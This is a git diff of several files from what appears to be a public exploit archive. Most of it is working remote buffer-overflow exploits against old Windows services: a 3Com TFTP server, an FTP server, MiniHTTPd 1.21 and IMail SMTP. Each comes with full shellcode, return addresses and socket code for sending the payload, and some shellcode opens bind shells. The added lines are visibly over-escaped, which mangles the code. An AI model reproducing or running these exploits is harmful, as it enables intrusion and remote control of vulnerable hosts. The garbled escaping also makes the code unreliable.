+my $shellcode =  \"\\x31\\xc9\\x83\\xe9\\xdb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xd8\".
+		 \"\\x22\\x72\\xe4\\x83\\xeb\\xfc\\xe2\\xf4\\x24\\xca\\x34\\xe4\\xd8\\x22\\xf9\\xa1\".
+		 \"\\xe4\\xa9\\x0e\\xe1\\xa0\\x23\\x9d\\x6f\\x97\\x3a\\xf9\\xbb\\xf8\\x23\\x99\\x07\".
+		 \"\\xf6\\x6b\\xf9\\xd0\\x53\\x23\\x9c\\xd5\\x18\\xbb\\xde\\x60\\x18\\x56\\x75\\x25\".
+		 \"\\x12\\x2f\\x73\\x26\\x33\\xd6\\x49\\xb0\\xfc\\x26\\x07\\x07\\x53\\x7d\\x56\\xe5\".
+		 \"\\x33\\x44\\xf9\\xe8\\x93\\xa9\\x2d\\xf8\\xd9\\xc9\\xf9\\xf8\\x53\\x23\\x99\\x6d\".
+		 \"\\x84\\x06\\x76\\x27\\xe9\\xe2\\x16\\x6f\\x98\\x12\\xf7\\x24\\xa0\\x2d\\xf9\\xa4\".
+		 \"\\xd4\\xa9\\x02\\xf8\\x75\\xa9\\x1a\\xec\\x31\\x29\\x72\\xe4\\xd8\\xa9\\x32\\xd0\".
+		 \"\\xdd\\x5e\\x72\\xe4\\xd8\\xa9\\x1a\\xd8\\x87\\x13\\x84\\x84\\x8e\\xc9\\x7f\\x8c\".
+		 \"\\x28\\xa8\\x76\\xbb\\xb0\\xba\\x8c\\x6e\\xd6\\x75\\x8d\\x03\\x30\\xcc\\x8d\\x1b\".
+		 \"\\x27\\x41\\x13\\x88\\xbb\\x0c\\x17\\x9c\\xbd\\x22\\x72\\xe4\";
 
-my $test= "\x90" x 108;
+my $test= \"\\x90\" x 108;
 
-my $msg1=$msg. "\x70\xFD\x8B\x01"."\x96\x64\xF8\x77". $test .  $shellcode. "\r\n";
+my $msg1=$msg. \"\\x70\\xFD\\x8B\\x01\".\"\\x96\\x64\\xF8\\x77\". $test .  $shellcode. \"\\r\\n\";
 
-$ftp->login($msg1."\r\n\0","umz") or die "Cannot login ", $ftp->message;
+$ftp->login($msg1.\"\\r\\n\\0\",\"umz\") or die \"Cannot login \", $ftp->message;
 
 $ftp->quit;
 
diff --git a/platforms/windows/remote/3170.pm b/platforms/windows/remote/3170.pm
index e07c6c977..1cbe9a36b 100755
--- a/platforms/windows/remote/3170.pm
+++ b/platforms/windows/remote/3170.pm
@@ -1,7 +1,7 @@
 package Msf::Exploit::3com_tftp_long_mode;
 
 use strict;
-use base "Msf::Exploit";
+use base \"Msf::Exploit\";
 use Pex::Text;
 use IO::Socket;
 
@@ -11,92 +11,92 @@ my $advanced =
 
 my $info =
   {
-	'Name'           => 'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability',
-	'Version'        => '$ 1.0 $',
-	'Authors'        => ['Enseirb <vincenty [at] enseirb.fr>', ],
-	'Description'    =>
+	\'Name\'           => \'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability\',
+	\'Version\'        => \'$ 1.0 $\',
+	\'Authors\'        => [\'Enseirb <vincenty [at] enseirb.fr>\', ],
+	\'Description\'    =>
 	  Pex::Text::Freeform(qq{
 		This vulnerability is caused due to a boundary error during the processing of TFTP Read/Write request packet types. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted packet with an overly long mode field (more than 460 bytes).
                             }),
 
-	'Arch'           => [ 'x86' ],
-	'OS'             => [ 'win32' ],
-	'Priv'           => 0,
+	\'Arch\'           => [ \'x86\' ],
+	\'OS\'             => [ \'win32\' ],
+	\'Priv\'           => 0,
 
-	'AutoOpts'       => { 'EXITFUNC' => 'seh' },
-	'UserOpts'       =>
+	\'AutoOpts\'       => { \'EXITFUNC\' => \'seh\' },
+	\'UserOpts\'       =>
 	  {
-		'RHOST'  => [ 1, 'ADDR', 'The TFTP target adress', "127.0.0.1" ],
-		'RPORT'  => [ 0, 'PORT', 'The TFTP target port', 69 ],
+		\'RHOST\'  => [ 1, \'ADDR\', \'The TFTP target adress\', \"127.0.0.1\" ],
+		\'RPORT\'  => [ 0, \'PORT\', \'The TFTP target port\', 69 ],
 	  },	
 
-	'Payload'        =>
+	\'Payload\'        =>
 	  {
-		'Space'    => 344,
-		'BadChars' => "\x00",
+		\'Space\'    => 344,
+		\'BadChars\' => \"\\x00\",
 	  },
 
-	'Refs'           =>
+	\'Refs\'           =>
 	  [
-		['URL', 'http://www.securityfocus.com/bid/21301'],
-		['CVE', '2006-6183'],
-		['URL', 'http://secunia.com/advisories/23113'],
-		['URL', 'http://www.securityfocus.com/archive/1/452754'],		
+		[\'URL\', \'http://www.securityfocus.com/bid/21301\'],
+		[\'CVE\', \'2006-6183\'],
+		[\'URL\', \'http://secunia.com/advisories/23113\'],
+		[\'URL\', \'http://www.securityfocus.com/archive/1/452754\'],		
 	  ],
 
-	'DefaultTarget'  => 0,
-	'Targets'        =>
+	\'DefaultTarget\'  => 0,
+	\'Targets\'        =>
 	  [
-		[ '0 - Windows XP SP2 ENG', 0x77d4e23b ], #or 0x77bc2063
-	        [ '1 - Windows XP SP1 FR', 0x77d8117b ],
-	        [ '2 - Windows XP SP2 FR', 0x77d8d9af ],
+		[ \'0 - Windows XP SP2 ENG\', 0x77d4e23b ], #or 0x77bc2063
+	        [ \'1 - Windows XP SP1 FR\', 0x77d8117b ],
+	        [ \'2 - Windows XP SP2 FR\', 0x77d8d9af ],
 	  ],
 
-	'Keys'           => [ '3com' ],
+	\'Keys\'           => [ \'3com\' ],
 
-	'DisclosureDate' => 'Nov 27 2006',
+	\'DisclosureDate\' => \'Nov 27 2006\',
   };
 
 sub new {
 	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	my $self = $class->SUPER::new({\'Info\' => $info, \'Advanced\' => $advanced}, @_);
 	return($self);
 }
 
 sub Exploit 
 {
     my $self = shift;
-    my $target_idx  = $self->GetVar('TARGET');
-    my $target_host = $self->GetVar('RHOST');
-    my $target_port = $self->GetVar('RPORT');
-    my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+    my $target_idx  = $self->GetVar(\'TARGET\');
+    my $target_host = $self->GetVar(\'RHOST\');
+    my $target_port = $self->GetVar(\'RPORT\');
+    my $shellcode = $self->GetVar(\'EncodedPayload\')->Payload;
     my $target = $self->Targets->[$target_idx];
 
-    my $buff = "\x00\x02"; # for a WRQ (WriteReQuest) (or "\x00\x01" for a RRQ)
-    $buff .= "filename_string";
-    $buff .= "\x00";
+    my $buff = \"\\x00\\x02\"; # for a WRQ (WriteReQuest) (or \"\\x00\\x01\" for a RRQ)
+    $buff .= \"filename_string\";
+    $buff .= \"\\x00\";
     $buff .= $self->MakeNops(129) . $shellcode; 
-    $buff .= pack('V',$target->[1]);
-    $buff .= "\x00";
+    $buff .= pack(\'V\',$target->[1]);
+    $buff .= \"\\x00\";
 
-    $self->PrintLine('[+] Try to connect... ' . $target_host . ':' . $target_port);
+    $self->PrintLine(\'[+] Try to connect... \' . $target_host . \':\' . $target_port);
 
     my $s = Msf::Socket::Udp->new
 	(
-	 'PeerAddr'  => $target_host,
-	 'PeerPort'  => $target_port,	 
+	 \'PeerAddr\'  => $target_host,
+	 \'PeerPort\'  => $target_port,	 
 	);
     
     if ($s->IsError) {
-	$self->PrintLine('[-] Error creating socket: ' . $s->GetError);
+	$self->PrintLine(\'[-] Error creating socket: \' . $s->GetError);
 	return;
     }
  
-    $self->PrintLine('[+] Connected!');
-    $self->PrintLine('[+] Sending exploit...');
+    $self->PrintLine(\'[+] Connected!\');
+    $self->PrintLine(\'[+] Sending exploit...\');
 
     $s->Send($buff);
-    $self->PrintLine('[+] Exploit sent!');
+    $self->PrintLine(\'[+] Exploit sent!\');
     $s->Close();
 
     return;
diff --git a/platforms/windows/remote/31789.py b/platforms/windows/remote/31789.py
index ca9c1ca40..e47fb3ba2 100755
--- a/platforms/windows/remote/31789.py
+++ b/platforms/windows/remote/31789.py
@@ -9,58 +9,58 @@
 import socket
 import datetime
 
-"""
+\"\"\"
 You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
 2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
-"""
+\"\"\"
 
-host = '192.168.213.10'
+host = \'192.168.213.10\'
 
-d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
+d = str(datetime.datetime.today()).split()[0].split(\'-\') # You should ideally consider servers date here
 for i in range(len(d)): d[i] = str(int(d[i]))
-d = '/'.join(d)	# Finally we got the date
+d = \'/\'.join(d)	# Finally we got the date
 
-# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
+# msfvenom -p windows/shell_bind_tcp -b \'\\x00\\x0a\\x0d\'
 shellcode = (
-"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
-"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
-"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
-"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
-"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
-"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
-"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
-"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
-"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
-"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
-"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
-"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
-"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
-"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
-"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
-"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
-"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
-"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
-"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
-"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
-"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
-"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
-"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
-"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
-"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
-"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
-"\x18\x37\x4e\x32")
+\"\\xda\\xdb\\xd9\\x74\\x24\\xf4\\xbe\\xb5\\x40\\x16\\xb6\\x5b\\x2b\\xc9\" +
+\"\\xb1\\x56\\x31\\x73\\x18\\x83\\xeb\\xfc\\x03\\x73\\xa1\\xa2\\xe3\\x4a\" +
+\"\\x21\\xab\\x0c\\xb3\\xb1\\xcc\\x85\\x56\\x80\\xde\\xf2\\x13\\xb0\\xee\" +
+\"\\x71\\x71\\x38\\x84\\xd4\\x62\\xcb\\xe8\\xf0\\x85\\x7c\\x46\\x27\\xab\" +
+\"\\x7d\\x66\\xe7\\x67\\xbd\\xe8\\x9b\\x75\\x91\\xca\\xa2\\xb5\\xe4\\x0b\" +
+\"\\xe2\\xa8\\x06\\x59\\xbb\\xa7\\xb4\\x4e\\xc8\\xfa\\x04\\x6e\\x1e\\x71\" +
+\"\\x34\\x08\\x1b\\x46\\xc0\\xa2\\x22\\x97\\x78\\xb8\\x6d\\x0f\\xf3\\xe6\" +
+\"\\x4d\\x2e\\xd0\\xf4\\xb2\\x79\\x5d\\xce\\x41\\x78\\xb7\\x1e\\xa9\\x4a\" +
+\"\\xf7\\xcd\\x94\\x62\\xfa\\x0c\\xd0\\x45\\xe4\\x7a\\x2a\\xb6\\x99\\x7c\" +
+\"\\xe9\\xc4\\x45\\x08\\xec\\x6f\\x0e\\xaa\\xd4\\x8e\\xc3\\x2d\\x9e\\x9d\" +
+\"\\xa8\\x3a\\xf8\\x81\\x2f\\xee\\x72\\xbd\\xa4\\x11\\x55\\x37\\xfe\\x35\" +
+\"\\x71\\x13\\xa5\\x54\\x20\\xf9\\x08\\x68\\x32\\xa5\\xf5\\xcc\\x38\\x44\" +
+\"\\xe2\\x77\\x63\\x01\\xc7\\x45\\x9c\\xd1\\x4f\\xdd\\xef\\xe3\\xd0\\x75\" +
+\"\\x78\\x48\\x99\\x53\\x7f\\xaf\\xb0\\x24\\xef\\x4e\\x3a\\x55\\x39\\x95\" +
+\"\\x6e\\x05\\x51\\x3c\\x0e\\xce\\xa1\\xc1\\xdb\\x41\\xf2\\x6d\\xb3\\x21\" +
+\"\\xa2\\xcd\\x63\\xca\\xa8\\xc1\\x5c\\xea\\xd2\\x0b\\xeb\\x2c\\x1d\\x6f\" +
+\"\\xb8\\xda\\x5c\\x8f\\x2f\\x47\\xe8\\x69\\x25\\x67\\xbc\\x22\\xd1\\x45\" +
+\"\\x9b\\xfa\\x46\\xb5\\xc9\\x56\\xdf\\x21\\x45\\xb1\\xe7\\x4e\\x56\\x97\" +
+\"\\x44\\xe2\\xfe\\x70\\x1e\\xe8\\x3a\\x60\\x21\\x25\\x6b\\xeb\\x1a\\xae\" +
+\"\\xe1\\x85\\xe9\\x4e\\xf5\\x8f\\x99\\xf3\\x64\\x54\\x59\\x7d\\x95\\xc3\" +
+\"\\x0e\\x2a\\x6b\\x1a\\xda\\xc6\\xd2\\xb4\\xf8\\x1a\\x82\\xff\\xb8\\xc0\" +
+\"\\x77\\x01\\x41\\x84\\xcc\\x25\\x51\\x50\\xcc\\x61\\x05\\x0c\\x9b\\x3f\" +
+\"\\xf3\\xea\\x75\\x8e\\xad\\xa4\\x2a\\x58\\x39\\x30\\x01\\x5b\\x3f\\x3d\" +
+\"\\x4c\\x2d\\xdf\\x8c\\x39\\x68\\xe0\\x21\\xae\\x7c\\x99\\x5f\\x4e\\x82\" +
+\"\\x70\\xe4\\x7e\\xc9\\xd8\\x4d\\x17\\x94\\x89\\xcf\\x7a\\x27\\x64\\x13\" +
+\"\\x83\\xa4\\x8c\\xec\\x70\\xb4\\xe5\\xe9\\x3d\\x72\\x16\\x80\\x2e\\x17\" +
+\"\\x18\\x37\\x4e\\x32\")
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((host, 21))
 
-nop = '\x90'*50
-eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
+nop = \'\\x90\'*50
+eip = \'\\x53\\x93\\x42\\x7E\' # EIP = 7E429353; JMP ESP in USER32.dll
 myip = s.getsockname()[0]
-padding = 'A' * (2029 - (len(d) + len(myip)))
+padding = \'A\' * (2029 - (len(d) + len(myip)))
 
 buf = padding + eip + nop + shellcode
 
-s.send('%s\r\n' % (buf))
+s.send(\'%s\\r\\n\' % (buf))
 s.recv(1024)
-print 'Payload sent'
+print \'Payload sent\'
 s.close()
diff --git a/platforms/windows/remote/31814.py b/platforms/windows/remote/31814.py
index 3a494845a..f369fabca 100755
--- a/platforms/windows/remote/31814.py
+++ b/platforms/windows/remote/31814.py
@@ -12,7 +12,7 @@
 # This is a slightly more weaponised version of the Mini HTTPD buffer overflow
 # written by Sumit, located here: http://www.exploit-db.com/exploits/31736/
 # I wrote this up because the existing version had a hard-coded payload and
-# didn't work on any of my XP boxes.
+# didn\'t work on any of my XP boxes.
 #
 # The instability of the existing is down to bad chars, and the parent thread
 # killing off the child thread when the thing is still running. This exploit
@@ -27,80 +27,80 @@ import struct, socket, sys, subprocess
 
 # Helper function that reads the body of files off disk.
 def file_content(path):
-  with open(path, 'rb') as f:
+  with open(path, \'rb\') as f:
     return f.read()
 
 # Sent the payload in the correct format to the target host/port.
 def pwn(host, port, payload):
-  print "[*] Connecting to {0}:{1}...".format(host, port)
+  print \"[*] Connecting to {0}:{1}...\".format(host, port)
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((host, port))
-  print "[*] Connected, sending payload {0} bytes...".format(len(payload))
-  payload = "POST /{0} HTTP/1.1\r\nHost: {1}\r\n\r\n".format(payload, host)
+  print \"[*] Connected, sending payload {0} bytes...\".format(len(payload))
+  payload = \"POST /{0} HTTP/1.1\\r\\nHost: {1}\\r\\n\\r\\n\".format(payload, host)
   s.send(payload)
   s.shutdown
   s.close
-  print "[+] Payload of {0} bytes sent, hopefully your shellcode executed.".format(len(payload))
+  print \"[+] Payload of {0} bytes sent, hopefully your shellcode executed.\".format(len(payload))
 
 # Create the part of the payload creates a thread to run the final payload in.
 def create_payload_thread(final_payload_size):
-  VirtualAlloc = struct.pack("<L", 0x7c809AE1)   # in kernel32
-  CreateThread = struct.pack("<L", 0x7c8106c7)   # in kernel32
-  SuspendThread = struct.pack("<L", 0x7c83974A)  # in kernel32
+  VirtualAlloc = struct.pack(\"<L\", 0x7c809AE1)   # in kernel32
+  CreateThread = struct.pack(\"<L\", 0x7c8106c7)   # in kernel32
+  SuspendThread = struct.pack(\"<L\", 0x7c83974A)  # in kernel32
 
-  payload  = ""
-  payload += "\x83\xec\x02"   # add esp, 0x2 (aligns the stack)
-  payload += "\x89\xe6"       # mov esi, esp
-  payload += "\x83\xc6\x00"   # add esi, <some offset filled later>
+  payload  = \"\"
+  payload += \"\\x83\\xec\\x02\"   # add esp, 0x2 (aligns the stack)
+  payload += \"\\x89\\xe6\"       # mov esi, esp
+  payload += \"\\x83\\xc6\\x00\"   # add esi, <some offset filled later>
   count_offset = len(payload) - 1
 
   # zero out ebx because we use zero a lot
-  payload += "\x31\xdb"             # xor ebx,ebx
+  payload += \"\\x31\\xdb\"             # xor ebx,ebx
 
   # allocate some memory to store our shellcode in which is
   # away from the current active area and somewhere safe
-  payload += "\x6a\x40"             # push 0x40
-  payload += "\x68\x00\x30\x00\x00" # push 0x3000
-  payload += "\x68\x00\x10\x00\x00" # push 0x1000
-  payload += "\x53"                 # push ebx
-  payload += "\xB8" + VirtualAlloc  # mov eax,<address>
-  payload += "\xff\xd0"             # call eax
+  payload += \"\\x6a\\x40\"             # push 0x40
+  payload += \"\\x68\\x00\\x30\\x00\\x00\" # push 0x3000
+  payload += \"\\x68\\x00\\x10\\x00\\x00\" # push 0x1000
+  payload += \"\\x53\"                 # push ebx
+  payload += \"\\xB8\" + VirtualAlloc  # mov eax,<address>
+  payload += \"\\xff\\xd0\"             # call eax
 
   # copy the payload over to the newly allocated area
-  size_bin = struct.pack("<L", final_payload_size + 4)
-  payload += "\xb9" + size_bin      # mov ecx,final_payload_size
-  payload += "\x89\xc7"             # mov edi,eax
-  payload += "\xf2\xa4"             # rep movsb
+  size_bin = struct.pack(\"<L\", final_payload_size + 4)
+  payload += \"\\xb9\" + size_bin      # mov ecx,final_payload_size
+  payload += \"\\x89\\xc7\"             # mov edi,eax
+  payload += \"\\xf2\\xa4\"             # rep movsb
 
   # create the thread with a starting address pointing to the
   # allocated area of memory
-  payload += "\x53"                 # push ebx
-  payload += "\x53"                 # push ebx
-  payload += "\x53"                 # push ebx
-  payload += "\x50"                 # push eax
-  payload += "\x53"                 # push ebx
-  payload += "\x53"                 # push ebx
-  payload += "\xB8" + CreateThread  # mov eax,<address>
-  payload += "\xff\xd0"             # call eax
+  payload += \"\\x53\"                 # push ebx
+  payload += \"\\x53\"                 # push ebx
+  payload += \"\\x53\"                 # push ebx
+  payload += \"\\x50\"                 # push eax
+  payload += \"\\x53\"                 # push ebx
+  payload += \"\\x53\"                 # push ebx
+  payload += \"\\xB8\" + CreateThread  # mov eax,<address>
+  payload += \"\\xff\\xd0\"             # call eax
 
   # We call SuspendThread on the current thread, because this
   # forces the parent to kill it. The bonus here is that doing
   # so prevents the thread from dying and bringing the whole
   # process down.
-  payload += "\x4b"                 # dec ebx
-  payload += "\x4b"                 # dec ebx
-  payload += "\x53"                 # push ebx
-  payload += "\xB8" + SuspendThread # mov eax,<address>
-  payload += "\xff\xd0"             # call eax
-  payload += "\x90" * 4
+  payload += \"\\x4b\"                 # dec ebx
+  payload += \"\\x4b\"                 # dec ebx
+  payload += \"\\x53\"                 # push ebx
+  payload += \"\\xB8\" + SuspendThread # mov eax,<address>
+  payload += \"\\xff\\xd0\"             # call eax
+  payload += \"\\x90\" * 4
 
   # fill in the correct offset so that we point ESI to the
   # right location at the start of the final payload
   size = len(payload) + final_payload_size % 4
 
-  print "[*] Final stage is {0} bytes.".format(final_payload_size)
+  print \"[*] Final stage is {0} bytes.\".format(final_payload_size)
 
-  offset = struct.pack("B", size)
+  offset = struct.pack(\"B\", size)
 
   # write the value to the payload at the right location and return
   return payload[0:count_offset] + offset + payload[count_offset+1:len(payload)]
@@ -108,49 +108,49 @@ def create_payload_thread(final_payload_size):
 # Creates the first stage of the exploit which overwrite EIP to get control.
 def create_stage1():
   eip_offset = 5412
-  jmp_esp = struct.pack("<L", 0x7e4456F7) # JMP ESP in advapi32
+  jmp_esp = struct.pack(\"<L\", 0x7e4456F7) # JMP ESP in advapi32
 
   eip_offset2 = eip_offset + 4
 
-  payload  = ""
-  payload += "A" * eip_offset    # padding to reach EIP overwrite
+  payload  = \"\"
+  payload += \"A\" * eip_offset    # padding to reach EIP overwrite
   payload += jmp_esp             # address to overwrite IP with
-  payload += "\x90"              # alignment
-  payload += "\x83\xEC\x21"      # rejig ESP
+  payload += \"\\x90\"              # alignment
+  payload += \"\\x83\\xEC\\x21\"      # rejig ESP
   return payload
 
 # Create encoded shellcode from the given payload.
 def create_encoded_shellcode(payload):
-  print "[*] Input payload of {0} bytes received. Encoding...".format(len(payload))
-  params = ['msfencode', '-e', 'x86/opt_sub', '-t', 'raw',
-      'BufferRegister=ESP', 'BufferOffset=42', 'ValidCharSet=filepath']
+  print \"[*] Input payload of {0} bytes received. Encoding...\".format(len(payload))
+  params = [\'msfencode\', \'-e\', \'x86/opt_sub\', \'-t\', \'raw\',
+      \'BufferRegister=ESP\', \'BufferOffset=42\', \'ValidCharSet=filepath\']
   encode = subprocess.Popen(params, stdout = subprocess.PIPE, stdin = subprocess.PIPE)
   shellcode, _ = encode.communicate(payload)
-  print "[*] Shellcode of {0} bytes generated.".format(len(shellcode))
+  print \"[*] Shellcode of {0} bytes generated.\".format(len(shellcode))
   return shellcode
 
-print ""
-print "MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial"
-print "-----------------------------------------------------"
-print ""
-print " Note: msfencode must be in the path and Metasploit must be up to date."
+print \"\"
+print \"MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial\"
+print \"-----------------------------------------------------\"
+print \"\"
+print \" Note: msfencode must be in the path and Metasploit must be up to date.\"
 
 if len(sys.argv) != 4:
-  print ""
-  print " Usage: {0} <host> <port> <payloadfile>".format(sys.argv[0])
-  print ""
-  print "          host : IP/name of the target host."
-  print "          port : Port that the target is running on."
-  print "   payloadfile : A file with the raw payload that is to be run."
-  print "                 This should be the raw, non-encoded output of"
-  print "                 a call to msfpayload"
-  print ""
-  print "   eg. {0} 192.168.1.1 80 reverse_shell_raw.bin"
-  print ""
+  print \"\"
+  print \" Usage: {0} <host> <port> <payloadfile>\".format(sys.argv[0])
+  print \"\"
+  print \"          host : IP/name of the target host.\"
+  print \"          port : Port that the target is running on.\"
+  print \"   payloadfile : A file with the raw payload that is to be run.\"
+  print \"                 This should be the raw, non-encoded output of\"
+  print \"                 a call to msfpayload\"
+  print \"\"
+  print \"   eg. {0} 192.168.1.1 80 reverse_shell_raw.bin\"
+  print \"\"
 else:
-  print ""
-  print "   Make sure you have your listeners running!"
-  print ""
+  print \"\"
+  print \"   Make sure you have your listeners running!\"
+  print \"\"
 
   host = sys.argv[1]
   port = int(sys.argv[2])
@@ -159,6 +159,6 @@ else:
   final_stage = file_content(payload_file)
   thread_payload = create_payload_thread(len(final_stage))
   shellcode = create_encoded_shellcode(thread_payload + final_stage)
-  padding = "A" * 0x10
+  padding = \"A\" * 0x10
   pwn(host, port, stage1 + shellcode + padding)
 
diff --git a/platforms/windows/remote/3264.pl b/platforms/windows/remote/3264.pl
index cc8fd449f..5fe7c086d 100755
--- a/platforms/windows/remote/3264.pl
+++ b/platforms/windows/remote/3264.pl
@@ -9,13 +9,13 @@ use IO::Socket::INET;
 use Switch;
 
 if (@ARGV < 3) {
-print "--------------------------------------------------------------------\n";
-print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n";
-print " Return address: \n";
-print " o1 - IMail 8.12 Version\n";
-print " o2 - IMail 8.10 Versio\n";
-print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n";
-print "--------------------------------------------------------------------\n";
+print \"--------------------------------------------------------------------\\n\";
+print \"Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\\n\";
+print \" Return address: \\n\";
+print \" o1 - IMail 8.12 Version\\n\";
+print \" o2 - IMail 8.10 Versio\\n\";
+print \" Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \\n\";
+print \"--------------------------------------------------------------------\\n\";
 }
 
 use IO::Socket::INET;
@@ -24,86 +24,86 @@ my $host = 10.0.0.2;
 my $port = 25;
 my $reply;
 my $request;
-my $happystack="\x81\xc4\xff\xef\xff\xff\x44";
+my $happystack=\"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\";
 
 
 
 foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);
 $eip = $1 if ($_=~/-o(.*)/);
 }
 
 switch ($eip) {
-case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12
-case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10
+case 1 { $eip=\"\\xc4\\x91\\x01\\x10\" } # pop eax ret in SmtpDLL.dll for IMail 8.12
+case 2 { $eip=\"\\xc3\\x88\\x01\\x10\" } # pop eax ret in SmtpDLL.dll for IMail 8.10
 }
 
 
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 
 
-my $shellcode  = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
-"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
-"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
-"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
-"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
-"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
-"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
-"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
-"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
-"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
-"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
-"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
-"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
-"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
-"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
-"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
-"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
